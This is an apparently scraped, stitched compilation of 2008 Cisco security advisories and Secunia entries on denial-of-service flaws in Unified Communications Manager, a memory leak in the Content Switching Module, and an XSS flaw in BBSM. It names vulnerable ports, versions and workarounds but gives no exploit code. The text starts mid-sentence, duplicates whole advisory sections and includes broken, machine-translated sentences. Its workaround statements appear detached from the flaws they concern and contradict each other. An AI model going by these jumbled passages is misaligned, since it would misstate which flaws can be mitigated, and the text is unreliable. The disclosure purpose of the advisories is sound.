vulnerabilities by implementing filtering on screening devices. SNMP Trap-Related Vulnerability To mitigate against the SNMP Trap service vulnerability (CSCsj24113), system administrators can disable the SNMP Trap service. To disable the Windows SNMP service, navigate to Start > Programs > Administrative Tools > Services, and stop the SNMP Service. Note: The SNMP Trap Service listed in the Windows Service configuration screen is not applicable to this vulnerability and disabling it does not provide any benefit as a workaround for this vulnerability. It is possible to mitigate the SNMP Trap service vulnerability by implementing filtering on screening devices. Permit access to UDP port 61441 only from management systems that need access to the SNMP Trap service. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. ustomers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were discovered internally by Cisco. Status of this Notice: FINAL THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-May-14 | public | | | | release | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. -----BEGIN PGP SIGNATURE----- iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW GpnghuWFfH2gIjp6Yk6857c= =L6xn -----END PGP SIGNATURE-----

Cisco Unified Communications Manager 4.1 before 4.1(3)SR7, 4.2 before 4.2(3)SR4, 4.3 before 4.3(2), 5.x before 5.1(3), and 6.x before 6.1(1) does not properly validate SIP URLs, which allows remote attackers to cause a denial of service (service interruption) via a SIP INVITE message, aka Bug ID CSCsl22355. Cisco Unified Communications Manager There is a service disruption (DoS) Vulnerabilities exist. The problem is Bug ID : CSCsl22355 It is a problem.Please refer to the “Overview” for the impact of this vulnerability. These issues affect the following components: Certificate Trust List (CTL) Provider Certificate Authority Proxy Function (CAPF) Session Initiation Protocol (SIP) Simple Network Management Protocol (SNMP) Trap An attacker can exploit these issues to cause denial-of-service conditions in the affected application. Cisco CUCM 4.1 prior to 4.1(3)SR7, 4.2 prior to 4.2(3)SR4, 4.3 prior to 4.3(2), 5.x prior to 5.1(3), 6. There is an input validation error vulnerability in version x, which is caused by not validating the SIP URL properly. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. This vulnerability is reported in version 5.x. 2) Another error within the CTL Provider service can be exploited to consume large amounts of memory resources via a series of specially crafted packets sent to default port 2444/TCP. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, and 4.3. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and 6.x. SOLUTION: Update to the fixed versions. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. These vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these vulnerabilities are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version can also be determined by running the command show version active via the command line interface (CLI). No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices, such as IP phones, media processing devices, voice-over-IP (VoIP) gateways, and multimedia applications. The CTL Provider service listens by default on TCP port 2444 and is user configurable. The CTL Provider service is enabled by default. There is a workaround for this vulnerability. The CTL Provider service listens by default on TCP port 2444 and is user configurable. There is a workaround for this vulnerability. Certificate Authority Proxy Function Related Vulnerability The Certificate Authority Proxy Function (CAPF) service of Cisco Unified Communications Manager versions 4.1, 4.2 and 4.3 contain a vulnerability when handling malformed input that may result in a DoS condition. The CAPF service listens by default on TCP port 3804 and is user configurable. The CAPF service is disabled by default. There is a workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. The SNMP Trap Agent service listens by default on UDP port 61441. There is a workaround for this vulnerability. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi98433 - CTLProvider leaks memory in certain scenarios CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46770 - CAPF crash with network traffic CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk46944 - CCM service restarts on receiving a valid SIP Packet CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsl22355 - CCM does not validate SIP URL input properly CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441 CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerabilities in this advisory may result in the interruption of voice services. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. It can downloaded at the following link: http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2 Workarounds =========== CTL Provider Related Vulnerabilities To mitigate against the CTL Provider service vulnerabilities (CSCsj80609 and CSCsi98433), system administrators can disable the CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL Provider menu selection. It is possible to mitigate the CTL Provider vulnerabilities by implementing filtering on screening devices. If the CTL Provider service is enabled, permit access to TCP port 2444 only between the Cisco Unified Communications Manager systems where the CTL Provider service is active and the CTL Client, usually on the administrator's workstation, to mitigate the CTL Provider service overflow. Note: It is possible to change the default port of the CTL Provider service (TCP port 2444). If changed, filtering should be based on the values used. CAPF Related Vulnerability To mitigate against the CAPF service vulnerability (CSCsk46770), system administrators can disable the CAPF service if it is not needed. If phones are not configured to use certificates, then the CAPF service can be disabled. The CAPF service is controlled by the Cisco Certificate Authority Proxy Function menu selection. It is possible to mitigate the CAPF vulnerability by implementing filtering on screening devices. If the CAPF service is enabled, permit access to TCP port 3804 only from networks that contain IP phone devices needing to utilize the CAPF service. SIP-Related Vulnerabilities It is possible to mitigate the SIP vulnerabilities by implementing filtering on screening devices. SNMP Trap-Related Vulnerability To mitigate against the SNMP Trap service vulnerability (CSCsj24113), system administrators can disable the SNMP Trap service. To disable the Windows SNMP service, navigate to Start > Programs > Administrative Tools > Services, and stop the SNMP Service. Note: The SNMP Trap Service listed in the Windows Service configuration screen is not applicable to this vulnerability and disabling it does not provide any benefit as a workaround for this vulnerability. It is possible to mitigate the SNMP Trap service vulnerability by implementing filtering on screening devices. Permit access to UDP port 61441 only from management systems that need access to the SNMP Trap service. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. ustomers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were discovered internally by Cisco. Status of this Notice: FINAL THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-May-14 | public | | | | release | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. -----BEGIN PGP SIGNATURE----- iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW GpnghuWFfH2gIjp6Yk6857c= =L6xn -----END PGP SIGNATURE-----

Memory leak in Cisco Content Switching Module (CSM) 4.2(3) up to 4.2(8) and Cisco Content Switching Module with SSL (CSM-S) 2.1(2) up to 2.1(7) allows remote attackers to cause a denial of service (memory consumption) via TCP segments with an unspecified combination of TCP flags. Cisco Unified Communications Manager is prone to multiple denial-of-service vulnerabilities. These issues affect the following components: Certificate Trust List (CTL) Provider Certificate Authority Proxy Function (CAPF) Session Initiation Protocol (SIP) Simple Network Management Protocol (SNMP) Trap An attacker can exploit these issues to cause denial-of-service conditions in the affected application. This issue occurs when CSM and CSM-S are configured to use layer 7 load balancing. An attacker can exploit this issue to cause devices using the module to stop accepting TCP connections or to overload, denying service to legitimate users. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. Cisco CSM 4.2.9: http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-csm?psrtdcat20e2 Cisco CSM 2.1.8: http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-csms?psrtdcat20e2 PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080514-csm.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Cisco has released free software updates that address this vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080514-csm.shtml. Affected Products ================= Vulnerable Products +------------------ The Cisco CSM and Cisco CSM-S are affected by the vulnerability described in this document if they are running an affected software version and are configured for layer 7 load balancing. The following versions of the Cisco CSM software are affected by this vulnerability: 4.2(3), 4.2(3a), 4.2(4), 4.2(5), 4.2(6), 4.2(7), and 4.2(8). The following versions of the Cisco CSM-S software are also affected by this vulnerability: 2.1(2), 2.1(3), 2.1(4), 2.1(5), 2.1(6), and 2.1(7). To determine the software version in use by the CSM or CSM-S, log into the supervisor of the chassis that hosts the CSM or CSM-S modules and issue the command "show module version" (Cisco IOS) or "show version" (Cisco CatOS). CSM modules will display as model "WS-X6066-SLB-APC", CSM-S modules will display as model "WS-X6066-SLB-S-K9", and the software version will be indicated next to the "Sw:" label. Note that the output from "show module version" (for Cisco IOS) is slightly different from the output from "show version" (for Cisco CatOS). However, in both cases the model names will read as previously described, and the software version will be easily identified by looking for the "Sw:" label. The following example shows a CSM in slot number 4 running software version 4.2(3): switch>show module version Mod Port Model Serial # Versions +--- ---- ------------------ ----------- ------------------------------------- 1 3 WS-SVC-AGM-1-K9 SAD092601W5 Hw : 1.0 Fw : 7.2(1) Sw : 5.0(3) 2 6 WS-SVC-FWM-1 SAD093200X8 Hw : 3.0 Fw : 7.2(1) Sw : 3.2(3)1 3 8 WS-SVC-IDSM-2 SAD0932089Z Hw : 5.0 Fw : 7.2(1) Sw : 5.1(6)E1 4 4 WS-X6066-SLB-APC SAD093004BD Hw : 1.7 Fw : Sw : 4.2(3) 5 2 WS-SUP720-3B SAL0934888E Hw : 4.4 Fw : 8.1(3) Sw : 12.2(18)SXF11 Sw1: 8.6(0.306)R3V15 WS-SUP720 SAL09348488 Hw : 2.3 Fw : 12.2(17r)S2 Sw : 12.2(18)SXF11 WS-F6K-PFC3B SAL0934882R Hw : 2.1 A Cisco CSM or CSM-S is configured for layer 7 load balancing if one or more layer 7 Server Load Balancing (SLB) policies are referenced in the configuration of a virtual server. There are six possible types of SLB policies: "client-group", "cookie-map", "header-map", "reverse-sticky", "sticky-group", and "url-map". Of these, the "client-group" policy type is always a layer 4 policy. The remaining policy types are layer 7 policies and, if used, would render a device affected by the vulnerability described in this document. Note the SLB policy "TEST-SPORTS-50", which uses "url-map" and "header-map" layer 7 policies, and that is applied to the virtual server named "WEB": module ContentSwitchingModule 5 [...] ! policy TEST-SPORTS-50 url-map SPORTS header-map TEST client-group 50 serverfarm WEBFARM2 ! vserver WEB virtual 10.20.221.100 tcp www serverfarm WEBFARM persistent rebalance slb-policy TEST-SPORTS-50 inservice Products Confirmed Not Vulnerable +-------------------------------- Only Cisco CSM modules running indicated 4.2 versions are affected by this vulnerability. CSM software versions 4.1, 3.2 and 3.1 are not affected by this vulnerability. Cisco CSM-S modules running indicated 2.1 versions are the only vulnerable versions of software for that product. The Cisco IOS SLB feature is not affected by this vulnerability. No other Cisco products are currently known to be affected by this vulnerability. The Cisco Secure Content Accelerator is not affected by this vulnerability. Details ======= The Cisco CSM is an integrated SLB line card for the Catalyst 6500 and 7600 Series that is designed to enhance the response time for client traffic to end points including servers, caches, firewalls, Secure Sockets Layer (SSL) devices, and VPN termination devices. The Cisco CSM-S combines high-performance SLB with SSL offload. The CSM-S is similar to the CSM; however, unlike the CSM, the CSM-S can terminate and initiate SSL-encrypted traffic. This ability allows the CSM-S to perform intelligent load balancing while ensuring secure end-to-end encryption. The memory leak can be detected by issuing the command "show module ContentSwitchingModule <slot #> tech-support all | include Outstanding" on the supervisor and checking the command output for a high number of outstanding buffers as seen in the following example: switch#show module ContentSwitchingModule 10 tech-support all | include Outstanding Outstanding slowpath(low pri) buffers 0 0 Outstanding slowpath(high pri) buffers 0 0 Outstanding blocks 0 0 Outstanding small buffers 0 0 Outstanding medium buffers 823 0 Outstanding large buffers 0 0 Outstanding sessions 0 0 Outstanding Closes 0 0 Close Relinquish Outstanding 0 Because small, medium, and large buffers can be affected by the memory leak, administrators are advised to check the number of these buffers in the output from the preceding command to accurately detect a memory leak condition. This vulnerability is documented in Cisco Bug ID CSCsl40722 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-1749. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding VSS Cat http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html. Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss. * CSM: Potential buffer loss with irregular client streams (CSCsl40722) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of this vulnerability against a system running a vulnerable version of the Cisco CSM or the Cisco CSM-S software may cause the CSM or CSM-S to stop passing traffic. Repeated attacks may result in a prolonged DoS condition, which could affect the services that are offered by the end point devices behind the CSM or CSM-S. Note that the supervisor or any other non-CSM or non-CSM-S service module in the same chassis of the Catalyst 6500 switch or 7600 Series router that hosts the CSM or CSM-S will not be affected by this vulnerability. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. This vulnerability is fixed in version 4.2.9 of the Cisco CSM software, and in version 2.1.8 of the Cisco CSM-S software. CSM software can be downloaded from http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-csm?psrtdcat20e2. Information on how to upgrade the CSM software is available at http://www.cisco.com/en/US/products/hw/modules/ps2706/products_tech_note09186a0080094526.shtml. CSM-S software can be downloaded from http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-csms?psrtdcat20e2. Information on how to upgrade the CSM-S software is available at http://www.cisco.com/en/US/docs/interfaces_modules/services_modules/csms/2.1.1/configuration/guide/getstart.html#wp1041858. Workarounds =========== There are no workarounds for this vulnerability. When the Cisco CSM or Cisco CSM-S has run out of memory it will simply stop passing traffic and it will have to be reloaded. The CSM and CSM-S can be reloaded via the command "hw-module module <CSM or CSM-S slot number> reset" (Cisco IOS) or via the command "reset <CSM or CSM-S slot number>" (Cisco CatOS) from the privileged EXEC prompt of the supervisor. There is no need to reload the supervisor. Obtaining Fixed Software ======================== Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. This vulnerability was discovered during the investigation of customer support cases. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080514-csm.shtml. In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +------------------------------------------------------------+ | Revision 1.0 | 2008-May-14 | Initial public release | +------------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- All contents are Copyright (C) 2007-2008 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- Updated: May 14, 2008 Document ID: 105450 +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFIKvyq86n/Gc8U/uARAknKAJ4h3Cv1kvEwebcrqEaYQ8J+AWcfvACggljK o0g1JsSfpI6hXBtkEYmWJj4= =B29t -----END PGP SIGNATURE-----

Cross-site scripting (XSS) vulnerability in AccessCodeStart.asp in Cisco Building Broadband Service Manager (BBSM) Captive Portal 5.3 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Cisco BBSM 5.3 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. Input passed to the "msg" parameter in AccessCodeStart.asp is not properly sanitised before being returned to a user. SOLUTION: Apply patch BBSMPatch5332.zip. http://tools.cisco.com/support/downloads/go/ImageList.x?relVer=5.3&mdfid=278455427&sftType=Building%20Broadband%20Service%20Manager%20(BBSM)%20Updates&optPlat=&nodecount=2&edesignator=null&modelName=Cisco%20Building%20Broadband%20Service%20Manager%205.3&treeMdfId=281527126&treeName=Network%20Monitoring%20and%20Management PROVIDED AND/OR DISCOVERED BY: Brad Antoniewicz ORIGINAL ADVISORY: http://archives.neohapsis.com/archives/bugtraq/2008-05/0166.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ 